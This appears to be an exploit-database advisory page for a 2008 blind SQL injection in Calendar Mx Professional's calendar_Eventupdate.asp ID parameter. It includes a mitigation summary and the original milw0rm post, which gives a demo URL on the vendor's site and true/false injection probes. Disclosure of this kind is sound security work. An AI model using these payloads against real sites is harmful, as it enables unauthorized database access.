Blind SQL Injection Vulnerability

vendor:

Calendar Mx Professional

by:

((Ñ�3d D3v!L))

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Calendar Mx Professional

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in Calendar Mx Professional, which is a web-based calendar application developed by www.mxmania.net. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent malicious user input from being passed to the database. Additionally, the application should be configured to use the least privileged account with access to the database.

Source

Exploit-DB raw data:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…------------------------------

 [~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability
   
 [~]Vendor: www.mxmania.net
   
 [~]Software: Calendar Mx Professional  
   
 [~]author: ((Ñ3d D3v!L))
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] --------------------------------{str0ke}---------------------------
   

 [~]3xpL0!7 4 d3m0:

 http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}

   
 [~] 8L!/\/D:
   
  7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1

  f4L53: calendar_Eventupdate.asp?ID=1 and 1=2

   
N073:

! 7h!/\/k u can f!nd m0r3 

just let your m1nd breath ;)

[[~]----------------------------------------{str0ke}----------------------------------------------
  

  [~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY
  [~]  
  [~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke}
  [~]
  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
  [~] xp10.biz & ahacker.biz
  [~]
  
[~]-----------------------------------------{str0ke}----------------------------------------------

# milw0rm.com [2008-12-03]